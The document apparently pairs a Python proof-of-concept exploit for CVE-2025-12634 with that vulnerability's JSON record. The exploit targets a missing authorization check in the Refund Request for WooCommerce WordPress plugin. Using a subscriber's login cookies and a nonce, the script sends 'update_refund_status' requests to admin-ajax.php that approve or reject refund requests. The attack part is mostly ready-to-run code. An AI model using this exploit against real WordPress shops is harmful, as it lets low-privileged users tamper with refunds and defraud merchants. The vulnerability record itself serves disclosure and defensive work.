CVE-2025-12634

# CVE-2025-12634 PoC - Refund Request for WooCommerce Unauthorized Status Update # Authentication Required: Subscriber-level or higher import requests import sys TARGET_URL = "https://vulnerable-site.com/wp-admin/admin-ajax.php" COOKIES = { "wordpress_test_cookie": "WP+Cookie+check", "wordpress_logged_in_[hash]": "your_auth_cookie" } def update_refund_status(refund_id, new_status, nonce): """ Update refund status without proper authorization check Args: refund_id: ID of the refund request to modify new_status: 'approved' or 'rejected' nonce: WordPress nonce for the request """ headers = { "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)", "Content-Type": "application/x-www-form-urlencoded", "Referer": TARGET_URL.replace("/admin-ajax.php", "/wp-admin/admin.php") } data = { "action": "update_refund_status", # Vulnerable action "refund_id": refund_id, "status": new_status, "_wpnonce": nonce } response = requests.post(TARGET_URL, data=data, cookies=COOKIES, headers=headers) return response.json() def main(): if len(sys.argv) < 4: print("Usage: python poc.py <refund_id> <status> <nonce>") print("Example: python poc.py 123 approved abc123") sys.exit(1) refund_id = sys.argv[1] status = sys.argv[2] # 'approved' or 'rejected' nonce = sys.argv[3] result = update_refund_status(refund_id, status, nonce) print(f"Response: {result}") if result.get("success"): print(f"[!] Successfully updated refund {refund_id} to {status}") else: print(f"[*] Request failed or returned error") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-12634", "sourceIdentifier": "[email protected]", "published": "2025-11-25T08:15:49.093", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Refund Request for WooCommerce plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'update_refund_status' function in all versions up to, and including, 1.0. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update refund statuses to approved or rejected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://wordpress.org/plugins/refund-request-for-woocommerce/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f15b4596-8e00-4e66-8b51-f49ede1ff307?source=cve", "source": "[email protected]"}]}}